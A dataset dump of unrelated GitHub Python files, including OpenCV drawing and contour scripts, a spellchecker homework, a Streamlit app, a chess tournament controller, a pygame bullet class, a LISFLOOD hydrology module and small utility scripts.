False\nxi,yi = -1,-1 #Starting coordinates\n\ndef draw(event,x,y,flags,param):\n    #print(x,y) #Prints the coordinates wherever the mouse moves.\n    \"\"\"if event == cv2.EVENT_LBUTTONDBLCLK: #If double-clicked\n        cv2.circle(img,(x,y),50,(255,0,0),-1) #Draws a circle at the clicked spot.\"\"\"\n    \n    global cizim\n    global xi,yi,mod\n    \n    if event == cv2.EVENT_LBUTTONDOWN: #When the mouse button is pressed\n        xi,yi = x,y\n        cizim = True\n    elif event == cv2.EVENT_MOUSEMOVE: #If the mouse is moved\n        if cizim == True:\n            if mod: \n                cv2.circle(img,(x,y),5,(100,50,0),-1)\n            else:\n                cv2.rectangle(img,(xi,yi),(x,y),(0,0,255),-1)\n        else:\n            pass\n    elif event == cv2.EVENT_LBUTTONUP: #If the mouse button is released\n        cizim = False\n        if mod: \n            cv2.circle(img,(x,y),5,(100,50,0),-1)\n        else:\n            cv2.rectangle(img,(xi,yi),(x,y),(0,0,255),-1)\n    \n\nimg = np.ones((512,512,3),np.uint8)\n\ncv2.namedWindow(\"paint\")\n\ncv2.setMouseCallback(\"paint\",draw)\n\nwhile(1):\n    cv2.imshow(\"paint\",img)\n    if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n        break\n    if cv2.waitKey(1) & 0xFF == ord(\"m\"):\n        mod = not mod\n    \ncv2.destroyAllWindows()\n\n\n","repo_name":"tosunersevde/OpenCv-Egitim-Ornekleri","sub_path":"udemy_opencv_fare_olaylari.py","file_name":"udemy_opencv_fare_olaylari.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74571727527","text":"\n\ndef read_file(file):\n    file = open(file)\n    file = file.read().split('\\n')\n    return file\n\n\ndef file_to_dict(file):\n    file = read_file(file)\n    i = 0\n    while i < len(file):\n        file[i] = file[i].split(',')\n        i += 1\n    file.pop()\n    words = dict()\n    for item in file:\n        words[item[0]] = item[1]\n    return (words)\n\n\ndef keyboard_file_to_dict(file):\n    file = read_file(file)\n    i = 0\n    while i < len(file):\n        file[i] = file[i].split(' ')\n        i += 1\n    replace = dict()\n    i = 0\n    while i < len(file):\n        j = 1\n        keys = []\n        while j < len(file[i]):\n            keys.append(file[i][j])\n            j += 1\n        replace[file[i][0]] = keys\n        i += 1\n    return (replace) # editor's fix: return the key->neighbours mapping; returning file made keyboard[charecter] crash below\n\n\ndef file_to_list(file):\n    file = read_file(file)\n    file = list(file)\n    if '' in file:\n        file.remove('')\n    return (file)\n\n\n\n\ndef found(listfile, dictionary, indexlist):\n    i = 0\n    while i < len(listfile):\n        indexlist.append(0)\n        if listfile[i] in dictionary:\n            indexlist[i] = 1\n        i += 1\n    return listfile, indexlist\n\n\ndef drop(listfile, dictionary, indexlist, wordfre):\n    i = 0\n    while i < len(listfile):\n        if indexlist[i] != 1:\n            j = 0\n            for charecter in listfile[i]:\n                newlistfile = listfile[i][:j] + listfile[i][j+1:]\n                if newlistfile in dictionary:\n                    wordfre[listfile[i]].append((dictionary[newlistfile], newlistfile))\n                    if indexlist[i] == 0: # editor's fix: compare the entry, not the whole list\n                        indexlist[i] = 2\n                    else:\n                        indexlist[i] += 1\n                j += 1\n        i += 1\n    return listfile, indexlist\n\n\ndef swap(listfile, dictionary, indexlist):\n    i = 0\n    while i < len(listfile):\n        if indexlist[i] != 1:\n            j = 0\n            for charecter in listfile[i]:\n                if j == 0:\n                    newlistfile = listfile[i][1] + listfile[i][0] + listfile[i][2:]\n                elif j == len(listfile[1]):\n                    newlistfile = listfile[i][:j-1] + listfile[i][j] + listfile[i][j-1]\n                else:\n                    newlistfile = listfile[i][:j-1] + listfile[i][j] + listfile[i][j-1] + listfile[i][j+1:]\n                if newlistfile in dictionary:\n                    wordfre[listfile[i]].append((dictionary[newlistfile], newlistfile))\n                    if indexlist[i] == 0:\n                        indexlist[i] = 2\n                    else:\n                        indexlist[i] += 1\n                j += 1\n        i += 1\n    return listfile, indexlist\n\n\n\ndef replace(listfile, dictionary, indexlist, keyboard):\n    i = 0\n    while i < len(listfile):\n        if indexlist[i] != 1:\n            j = 0\n            
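# editor's note: keyboard (after the fix in keyboard_file_to_dict) maps each key to its adjacent keys, so every position in the word is retried with each neighbouring key\n            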
for charecter in listfile[i]:\n                a = 0\n                if charecter == ' ':\n                    charecter = ''\n                while a < len(keyboard[charecter]):\n                    newlistfile = listfile[i][:j] + keyboard[charecter][a] + listfile[i][j+1:]\n                    if newlistfile in dictionary:\n                        wordfre[listfile[i]].append((dictionary[newlistfile], newlistfile))\n                        if indexlist[i] == 0:\n                            indexlist[i] = 2 # editor's fix: mark this word, not the whole list\n                        else:\n                            indexlist[i] += 1\n                    a += 1\n                j += 1\n        i += 1\n    return listfile, indexlist\n\n\n\n\n\n\n\"\"\"\ndictionary = input('Dictionary => ')\nprint(dictionary)\nlistfile = input('Input file => ')\nprint(listfile)\nkeyboard = input('Keyboard file => ')\nprint(keyboard)\n\"\"\"\ndictionary = 'words_10percent.txt'\nlistfile = 'input_words.txt'\nkeyboard = 'keyboard.txt'\n\n\ndictionary = file_to_dict(dictionary)\nlistfile = file_to_list(listfile)\nkeyboard = keyboard_file_to_dict(keyboard)\n\n\noldlistfile = list(listfile)\n\nindexlist = []\n\nwordfre = dict()\n\nfor i in range(len(listfile)):\n    wordfre[listfile[i]] = list()\n\nlistfile, indexlist = found(listfile, dictionary, indexlist)\nlistfile, indexlist = drop(listfile, dictionary, indexlist, wordfre)\nlistfile, indexlist = swap(listfile, dictionary, indexlist)\nlistfile, indexlist = replace(listfile, dictionary, indexlist, keyboard)\n\n\n\nspecial = []\nfor word in wordfre:\n    wordfre[word] = set(wordfre[word])\n    wordfre[word] = list(wordfre[word])\n    wordfre[word] = sorted(wordfre[word])\n    special.append(len(wordfre[word]))\n\n\nprint('Spellcheck results:')\ni = 0\nwhile i < len(listfile):\n    if special[i] < indexlist[i]:\n        indexlist[i] = special[i]\n    if indexlist[i] == 0:\n        index = 'NO MATCH'\n    elif indexlist[i] == 1:\n        index = 'FOUND'\n    \n    if indexlist[i] < 2:\n        print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], listfile[i], index))\n    elif indexlist[i] == 2:\n        print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-1][1], 'MATCH 1'))\n    elif indexlist[i] == 3: \n        print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-1][1], 'MATCH 1'))\n        print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-2][1], 'MATCH 2'))\n    elif indexlist[i] == 4: \n        print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-1][1], 'MATCH 1'))\n        print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-2][1], 'MATCH 2'))\n        print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-3][1], 'MATCH 3'))\n    i += 1 # editor's fix: advance i, otherwise the results loop never terminates\n","repo_name":"sriyuthsagi/CSCI-1100-Computer-Science-I","sub_path":"Homework/Homework 7/hw7Part1.py","file_name":"hw7Part1.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40264989209","text":"\"\"\"Main module for the streamlit app\"\"\"\nimport streamlit as st\nimport pages.welcome\nimport pages.tagger\nimport pages.insert\nimport pages.feedback\nimport pages.training\nimport pages.load_logs\nfrom utils import load_css, reset\n\nPAGES = {\n    \"Welcome\": pages.welcome,\n    \"Log Tagger\": pages.tagger,\n    \"Train Feedback\": pages.feedback,\n    \"Create New Log\": pages.insert,\n    \"Trained Exception\": pages.training,\n    \"Load Logs\": pages.load_logs,\n}\n\n\ndef main():\n    st.set_page_config(page_title=\"Ernst & Young - Tagler: Smart Exception Tagger and Healer\",page_icon=\"⚠️\",layout=\"wide\")\n    load_css(\"./css/my.css\") \n    #st.write('
Tagler
', unsafe_allow_html=True)\n st.sidebar.image(\"./images/favicon.png\", width=100)\n st.sidebar.title(\"Navigation\")\n selection = st.sidebar.radio(\"Go to\", list(PAGES.keys()))\n\n r = st.sidebar.button(\"Reset\")\n page = PAGES[selection]\n page.write()\n\n if(r):\n reset()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ankitshaw/Tagler","sub_path":"frontend/tagler/web_app.py","file_name":"web_app.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74716482407","text":"#DADO EL MONTO DE COMPRA DE UN CLIENTE\n#si LA COMPRA es MAYOR A #10000 DESCONTAR 5%\n#si la compra es mayor a 15000 descontar 10%\n#si la compra es mayor a 50000 descontar un 20%\n#si la compra es mayor a 100000 descontar un 30%\n# MOSTRAR AL FINAL EL MONTO TOTAL Y EL DESCUENTO REALIZADO\n\ncompra = float(input(\"Ingrese el valor de la compra: $\"))\ncompra_inicial = compra\n\nif (compra > 100000):\n descuento = compra * 0.3\n compra = compra - (descuento)\nelif (compra > 50000):\n descuento = compra * 0.2\n compra = compra - (descuento)\nelif (compra > 15000):\n descuento = compra * 0.1\n compra = compra - (descuento)\nelif (compra > 10000):\n descuento = compra * 0.05\n compra = compra - (descuento)\nelse:\n descuento = 0\n\nprint(f\"Monto inicial: ${compra_inicial}\")\nprint(f\"Descuento: ${round(descuento, 2)}\")\nprint(f\"Monto final: ${round(compra, 2)}\")\n","repo_name":"AlexisRmnk/practicaInformatorio2022","sub_path":"prog_web/01_python/practicas_01_informatorio/notas_clases_online/clase04.py","file_name":"clase04.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74513116646","text":"# Import the pandas library\nimport pandas as pd\nimport matplotlib as plt\n\n# # Save the data from data/acts_sections.csv to a variable\n# df = pd.read_csv('data/acts_sections.csv')\n\n# Read the data from data/custom/cases_2018_criminal.csv \ndf = pd.read_csv('data/custom/cases_2018_criminal.csv')\n\n# Save the data from data/custom/women_acts.csv to a variable\nacts = pd.read_csv('data/custom/women_acts.csv')\n\n# Save the data from data/custom/women_sections.csv to a variable\nsections = pd.read_csv('data/custom/women_sections.csv')\n\n# Count the number of cases for which the \"act\" column matches any value in \"act\" column of acts OR \"section\" column matches any value in \"section\" column of sections\nm = df.act.isin(acts.act) | df.section.isin(sections.section)\ndf = df[m]\n\n# Save the result to a csv file\ndf.to_csv('data/custom/women_cases.csv', index=False)\n\n\n\n\n\n\n","repo_name":"AnirudhGovil/CourtCasesAnalysis","sub_path":"analysis/step6.py","file_name":"step6.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2682369852","text":"#!/usr/bin/python3\ndef safe_print_list(my_list=[], x = 0):\n new_list = []\n for count, item in enumerate(my_list):\n if count == x:\n break\n new_list.append(item)\n try:\n for x in new_list:\n print(\"{}\".format(x), end=\"\")\n print(\"\")\n if count < x:\n raise my_Error\n return x\n except:\n return count + 
1\n","repo_name":"angelofgrace/holbertonschool-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14644622254","text":"import cv2\nimport sys\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef readImage(filepath):\n return cv2.imread(filepath, cv2.IMREAD_COLOR)\n\ndef saveImage(filepath, image):\n cv2.imwrite(filepath, image)\n\ndef convertColors(image):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(image, 200, 255, 0)\n return thresh\n\ndef getContours(image):\n image = cv2.Canny(image, 0, 200) \n return np.where(image == 0, 255, 0)\n\ndef getImageProperties(image, gray_image):\n contours, _ = cv2.findContours(gray_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE) \n i = 0\n areas = np.zeros(len(contours) - 1)\n contours = contours[1:]\n contours.reverse()\n print(\"Número de regiões: \", len(contours), \"\\n\")\n for c in contours:\n # calculate moments for each contour\n M = cv2.moments(c)\n \n # calculate x,y coordinate of center\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n\n cv2.putText(image, str(i), (cX-4, cY+4), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 0), 0)\n # Area\n areas[i] = cv2.contourArea(c)\n # Perimeter\n perimeter = round(cv2.arcLength(c, True), 6)\n # Eccentricity\n a1 = (M['mu20']+M['mu02'])/2\n a2 = np.sqrt(4*M['mu11']**2+(M['mu20']-M['mu02'])**2)/2\n minor_axis = a1-a2\n major_axis = a1+a2\n eccentricity = round(np.sqrt(1-minor_axis/major_axis), 6)\n # Solidity\n hull = cv2.convexHull(c)\n hull_area = cv2.contourArea(hull)\n solidity = round(float(areas[i])/hull_area, 6)\n\n print(\"Região\", str(i) + \":\", \"área:\", areas[i], \"perímetro:\", perimeter, \"excentricidade:\", eccentricity, \"solidez:\", solidity)\n i = i + 1\n return (image, areas)\n\ndef getAreasHistogram(areas, filepath):\n areasNumber = np.zeros(3)\n areasNumber[0] = len(areas[areas < 1500])\n areasNumber[1] = len([a for a in areas if a >= 1500 and a < 3000])\n areasNumber[2] = len(areas[areas >= 3000])\n print(\"Número de regiões pequenas:\", int(areasNumber[0]))\n print(\"Número de regiões médias:\", int(areasNumber[1]))\n print(\"Número de regiões grandes:\", int(areasNumber[2]))\n\n plt.title('Histograma de áreas dos objetos')\n plt.xlabel('Área')\n plt.ylabel('Número de Objetos')\n plt.hist(areas, bins=3)\n plt.savefig(filepath)\n\nif __name__ == '__main__':\n in_file = sys.argv[1]\n out_file = sys.argv[2]\n out_path = os.path.dirname(os.path.realpath(__file__)) + \"/out/\" + out_file + \"/\"\n if not os.path.exists(\"./out/\"):\n os.makedirs(\"./out/\")\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n\n image = readImage(in_file)\n\n gray_image = convertColors(image)\n saveImage(out_path + out_file + \"_1.png\", gray_image)\n\n edged_image = getContours(gray_image)\n saveImage(out_path + out_file + \"_2.png\", edged_image)\n\n (image, areas) = getImageProperties(image, gray_image)\n saveImage(out_path + out_file + \"_3.png\", image)\n\n getAreasHistogram(areas, out_path + out_file + \"_4.png\")","repo_name":"Fabio-Ricci/unicamp","sub_path":"mc920/trab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38317491123","text":"#!/usr/bin/env python\n# encoding: 
utf-8\n\"\"\"\nAstrorec paper recommendation engine\n\"\"\"\n\nimport os\nimport argparse\n\nfrom astrorec.latexrec import LaTeXRecommender\nfrom astrorec.arxivrec import ArXivRecommender\n\nfrom starlit.bib.adscache import ADSCacheDB\nfrom starlit.bib.adsdb import ADSBibDB\n\n\ndef main():\n args = parse_args()\n\n cachedb = ADSCacheDB(host='localhost',\n port=27017,\n ads_db=ADSBibDB())\n\n if os.path.exists(args.input_token):\n # assume it's a latex file\n rec = LaTeXRecommender(args.input_token, ads_cache=cachedb)\n else:\n # assume it's an arXiv ID. Could also be a ADS bibcode eventually\n rec = ArXivRecommender(args.input_token)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_token',\n help='arxiv ID or path to latex manuscript')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"freelanceastro/astrorec","sub_path":"scripts/astrorecs.py","file_name":"astrorecs.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13659175787","text":"import pygame\r\nimport config\r\n\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n\r\n def __init__(self, owner, player, enemy):\r\n super(Bullet, self).__init__()\r\n\r\n # Who shot the bullet\r\n self.owner = owner\r\n\r\n # Reference to the player\r\n self.player = player\r\n\r\n # Reference to the enemy\r\n self.enemy = enemy\r\n\r\n # Positional Properties\r\n self.radius = 5\r\n self.x = owner.x\r\n self.y = owner.y\r\n\r\n # Horizontal Velocity\r\n self.dx = 0\r\n\r\n if owner == player:\r\n\r\n # Vertical Velocity\r\n self.dy = -20\r\n self.owner = 1\r\n\r\n elif owner == enemy:\r\n\r\n # Vertical Velocity\r\n self.dy = 20\r\n self.owner = 2\r\n\r\n def update(self):\r\n\r\n # Apply Transforms\r\n self.y += self.dy\r\n\r\n # Render onto screen\r\n\r\n pygame.draw.circle(config.window, (255, 255, 255), (self.x, self.y), self.radius)\r\n\r\n # Check if out of bounds\r\n self.check_life_span()\r\n\r\n # Check for collisions\r\n self.check_collision()\r\n\r\n def check_collision(self):\r\n\r\n # Check if collided with enemy\r\n if self.owner == 1:\r\n if abs(self.y - self.enemy.y) <= self.enemy.radius:\r\n if abs(self.x - self.enemy.x) <= self.enemy.radius:\r\n self.enemy.collided = True\r\n self.enemy.hp -= 10\r\n self.kill()\r\n\r\n # Check if collided with player\r\n if self.owner == 2:\r\n\r\n if abs(self.y - self.player.y) <= self.player.radius:\r\n if abs(self.x - self.player.x) <= self.player.radius:\r\n self.player.collided = True\r\n self.player.hp -= 10\r\n self.kill()\r\n\r\n def check_life_span(self):\r\n\r\n # Basic Bounds Checking\r\n if self.y < 150:\r\n self.kill()\r\n\r\n if self.y > 650:\r\n self.kill()\r\n","repo_name":"robrose455/RL_Shootout","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31796858557","text":"from sklearn.model_selection import GridSearchCV\n\nparam_grid = {'learning_rate': [0.001, 0.01, 0.1], 'max_depth': [2, 4, 6, 8]} # Choose the parameters I want to tune and what values to try\n\ngrid = GridSearchCV(GradientBoostingClassifier(n_estimators=40), # setting n_estimators low to make it go a bit faster\n param_grid=param_grid, # Our search space - 4 * 3 = 12 models\n n_jobs=4, # Simple parallelization\n verbose=1, # Get some text output\n scoring='roc_auc') # What scoring function to use to 
compare models\n\ngrid.fit(train_x, train_y) # Train all combinations of parameters\n\nprint(f\"Best score: {grid.best_score_:.3f}\") # Get the score of the best-scoring model\nprint(f\"Best params: {grid.best_params_}\") # Get the params of the best-scoring model\npd.DataFrame(grid.cv_results_).sort_values(by='rank_test_score') # Pretty print our results\n","repo_name":"andersbogsnes/sklearn_tutorial","sub_path":"snippets/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40906583841","text":"from helpers import get_rank\n\nfrom views.base import View\n\nfrom controllers.player import PlayerController\nfrom controllers.tournament import TournamentController\nfrom models.Player import player_database\n\n\nclass MenuController:\n def __init__(self):\n self.view = View()\n\n self.player = PlayerController()\n self.tournament = TournamentController()\n\n def report_menu(self):\n all_players = self.player.get_all_players()\n all_tournaments = self.tournament.get_all_tournaments()\n while True:\n option = self.view.select_report_menu()\n if option == '1':\n all_players = sorted(all_players, key=lambda x: (x['last_name'], x['first_name']))\n self.view.players_list(all_players)\n elif option == '2':\n all_players.sort(key=get_rank)\n self.view.players_list(all_players)\n elif option == '3':\n tournament_id = self.view.select_tournament(all_tournaments)\n tournament_players = self.tournament.get_one_tournament_players(tournament_id)\n tournament_players = sorted(all_players, key=lambda x: (x['last_name'], x['first_name']))\n self.view.players_list(tournament_players)\n elif option == '4':\n tournament_id = self.view.select_tournament(all_tournaments)\n tournament_players = self.tournament.get_one_tournament_players(tournament_id)\n tournament_players.sort(key=get_rank)\n self.view.players_list(tournament_players)\n elif option == '5':\n self.view.tournaments_list(all_tournaments)\n elif option == '6':\n tournament_id = self.view.select_tournament(all_tournaments)\n tournament_rounds = self.tournament.get_one_tournament_rounds(tournament_id)\n self.view.rounds_list(tournament_rounds)\n elif option == '7':\n tournament_id = self.view.select_tournament(all_tournaments)\n tournament_rounds = self.tournament.get_one_tournament_rounds(tournament_id)\n self.view.matches_list(tournament_rounds)\n elif option == '0':\n break\n\n def main_menu(self):\n while True:\n option = self.view.select_main_menu()\n if option == '1':\n self.tournament.create_tournament()\n elif option == '2':\n self.tournament_menu()\n elif option == '3':\n self.player.create_player()\n elif option == '4':\n all_players = self.player.get_all_players()\n player_id = self.view.select_player(all_players)\n player_id = int(player_id)\n ranking = self.view.rank_from()\n self.player.update_one_player_rank(player_id, ranking)\n elif option == '5':\n self.report_menu()\n elif option == '0':\n break\n\n def match_menu(self, tournament_id):\n while True:\n tournament = self.tournament.get_one_tournament(tournament_id)\n tournament_rounds_number = tournament['rounds_number']\n tournament_id = tournament.doc_id\n round_index = tournament['round_index']\n match_index = tournament['match_index']\n players_id = tournament['players']\n round_counter = round_index + 1\n players = []\n\n if match_index == 4:\n self.tournament.update_one_tournament_round_end_time(tournament_id, round_index)\n 
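# editor's note: all 4 matches of this round have been scored, so close the round out and advance the round/match counters before fetching the next match\n                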
self.tournament.update_one_tournament_round_index(tournament_id)\n                self.tournament.reset_one_tournament_match_index(tournament_id)\n                tournament = self.tournament.get_one_tournament(tournament_id)\n                round_index = tournament['round_index']\n                match_index = tournament['match_index']\n                round_counter = round_counter + 1\n\n                if round_counter <= tournament_rounds_number:\n                    if match_index == 0:\n                        for player_id in players_id:\n                            players.append(player_database.get(doc_id=player_id))\n\n                        matches = self.tournament.create_tournament_rounds_matches(\n                            players,\n                            round_counter,\n                            tournament_id)\n                        for match in matches:\n                            player_1 = match[0][0]\n                            player_2 = match[1][0]\n                            self.player.update_one_player_opponents(player_1, player_2)\n                            self.player.update_one_player_opponents(player_2, player_1)\n\n                        self.tournament.create_tournament_round(tournament_id, round_counter, matches)\n                else:\n                    round_index = round_index - 1\n                    self.tournament.update_one_tournament_round_end_time(tournament_id, round_index)\n                    self.tournament.reset_one_tournament_match_index(tournament_id)\n                    break\n            elif match_index == 0:\n                for player_id in players_id:\n                    players.append(player_database.get(doc_id=player_id))\n\n                matches = self.tournament.create_tournament_rounds_matches(players, round_counter, tournament_id)\n                for match in matches:\n                    player_1 = match[0][0]\n                    player_2 = match[1][0]\n                    self.player.update_one_player_opponents(player_1, player_2)\n                    self.player.update_one_player_opponents(player_2, player_1)\n\n                self.tournament.create_tournament_round(tournament_id, round_counter, matches)\n\n            match = self.tournament.get_one_tournament_match(tournament_id, round_index, match_index)\n            option = self.view.select_match_menu(match)\n            if option == '1':\n                self.tournament.update_score(tournament, match)\n            elif option == '0':\n                break\n\n    def tournament_menu(self):\n        all_tournaments = self.tournament.get_all_tournaments()\n\n        while True:\n            option = self.view.select_tournament(all_tournaments)\n            if option == '0':\n                break\n            else:\n                tournament_id = option\n                tournament_id = int(tournament_id)\n                tournament = self.tournament.get_one_tournament(tournament_id)\n\n                while True:\n                    option = self.view.select_tournament_menu(tournament)\n                    if option == '1':\n                        self.match_menu(tournament.doc_id)\n                    if option == '2':\n                        self.select_player_menu(tournament)\n                    elif option == '0':\n                        break\n\n    def select_player_menu(self, tournament):\n        all_players = self.player.get_all_players()\n        tournament_id = tournament.doc_id\n\n        while True:\n            option = self.view.select_player(all_players)\n            if option == '0':\n                break\n            else:\n                player_id = option\n                player_id = int(player_id)\n\n                self.tournament.update_one_tournament_players(tournament_id, player_id)\n","repo_name":"For4llx/chess_management","sub_path":"controllers/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36851949592","text":"from utils import (\n    Base,\n    engine,\n    PageParser,\n    add_stage_name,\n    db_notempty\n\n)\nfrom telegram_bot import bot\nfrom core import USER_STAGES, PARSE_URLS\nimport logging\n\n\ndef main():\n    # Create the database\n    Base.metadata.create_all(engine)\n\n    # Set up the log\n    logging.basicConfig(filename=\"./logs/app_log.log\", filemode=\"w\",\n                        format=\"%(asctime)s %(levelname)s %(message)s\")\n    logging.captureWarnings(True)\n\n    # If the database has no records yet\n    if not db_notempty():\n        parser = PageParser()\n\n        # Parse all the sites\n        for url in PARSE_URLS:\n            parser.parse_site(url)\n\n        # Write all of the user's bot \"stages\" to the database\n        logging.info('Writing app stage names')\n        for stage in USER_STAGES:\n            add_stage_name(stage)\n\n        logging.info('Data created!')\n\n    bot.polling(none_stop=True, interval=0)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"oilgo/toastbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18527376279","text":"from __future__ import absolute_import, print_function\n\nfrom ..global_modules.add1 import loadmap, readnetcdf\nfrom ..global_modules.settings import LisSettings\nfrom . import HydroModule\n\n\nclass landusechange(HydroModule):\n\n    \"\"\"\n    # ************************************************************\n    # ***** LAND USE CHANGE : FRACTION MAPS **********************\n    # ************************************************************\n\n    # Each pixel is divided into several fractions, adding up to 1\n    # open water\n    # forest\n    # sealed fraction\n    # irrigated areas\n    # rice irrigation areas\n    # other\n    \"\"\"\n    input_files_keys = {'all': ['ForestFraction', 'DirectRunoffFraction', 'WaterFraction',\n                                'IrrigationFraction', 'RiceFraction', 'OtherFraction'],\n                        'TransientLandUseChange': ['ForestFractionMaps', 'DirectRunoffFractionMaps', 'WaterFractionMaps',\n                                                   'IrrigationFractionMaps', 'RiceFractionMaps', 'OtherFractionMaps']}\n    module_name = 'LandUseChange'\n\n    def __init__(self, landusechange_variable):\n        self.var = landusechange_variable\n\n# --------------------------------------------------------------------------\n# --------------------------------------------------------------------------\n\n    def initial(self):\n        \"\"\" initial part of the landusechange module\n        \"\"\"\n\n        self.var.ForestFraction = loadmap('ForestFraction', timestampflag='closest').copy()\n        self.var.DirectRunoffFraction = loadmap('DirectRunoffFraction', timestampflag='closest').copy()\n        self.var.WaterFraction = loadmap('WaterFraction', timestampflag='closest').copy()\n        self.var.IrrigationFraction = loadmap('IrrigationFraction', timestampflag='closest').copy()\n        self.var.RiceFraction = loadmap('RiceFraction', timestampflag='closest').copy()\n        self.var.OtherFraction = loadmap('OtherFraction', timestampflag='closest').copy()\n\n    def dynamic(self):\n        \"\"\"dynamic part of the landusechange module\n        \"\"\"\n        settings = LisSettings.instance()\n        option = settings.options\n        binding = settings.binding\n\n        if option['TransientLandUseChange'] and option['readNetcdfStack']:\n            self.var.ForestFraction = readnetcdf(binding['ForestFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n            self.var.DirectRunoffFraction = readnetcdf(binding['DirectRunoffFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n            self.var.WaterFraction = readnetcdf(binding['WaterFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n            self.var.IrrigationFraction = readnetcdf(binding['IrrigationFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n            self.var.RiceFraction = readnetcdf(binding['RiceFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n            self.var.OtherFraction = readnetcdf(binding['OtherFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n\n        self.var.Test = 
self.var.RiceFraction*1.0\n","repo_name":"hzeinivand/lisflood","sub_path":"src/lisflood/hydrological_modules/landusechange.py","file_name":"landusechange.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41497278252","text":"from hak.one.directory.filepaths.get import f as get_filepaths\nfrom hak.one.file.remove import f as remove_file\nfrom hak.one.file.save import f as save_file\nfrom hak.one.file.load import f as load_file\nfrom time import sleep\nfrom time import time\n\nfrom src.str.is_well_formed import f as filter\nfrom src.str.to_next_str import f as to_next_str\n\nget_t = lambda: int(time()/900)*900\n\nstring = load_file('latest.txt')\nlatest = string\nprint(f'string: {repr(string)}')\n\nwhile True:\n filepaths = get_filepaths('./signal', [])\n print(time(), filepaths)\n print(f'string: {repr(string)}')\n t = get_t()\n with open(f'./output/out_{t}.txt', 'a') as _file:\n for _ in range(600000):\n string = to_next_str(string)\n if filter(string):\n latest = string\n _file.write('\\n'+latest)\n\n save_file('latest.txt', latest)\n \n if './signal/stop.signal' in filepaths:\n remove_file('./signal/stop.signal')\n break\n\nprint('fin')","repo_name":"JohnForbes/kolmogorov","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22382345444","text":"\nimport csv\nimport random\nimport time\n\nx_value = 0\ntotal_1 = 1000\ntotal_2 = 1000\n\nfieldnames = [\"x_value\", \"total_1\", \"total_2\"]\ndataFileName = 'dataGen.csv'\n\nwith open(dataFileName, 'w') as csv_file:\n csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n csv_writer.writeheader()\n\nwhile True:\n\n with open(dataFileName, 'a') as csv_file:\n csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n\n info = {\n \"x_value\": x_value,\n \"total_1\": total_1,\n \"total_2\": total_2\n }\n\n csv_writer.writerow(info)\n print(x_value, total_1, total_2)\n\n x_value += 1\n total_1 = total_1 + random.randint(-6, 8)\n total_2 = total_2 + random.randint(-5, 6)\n\n 